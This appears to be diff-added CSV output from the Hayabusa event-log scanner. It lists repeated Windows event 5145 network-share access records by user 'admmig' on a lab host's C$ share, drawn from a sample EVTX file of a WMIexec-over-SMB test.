+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
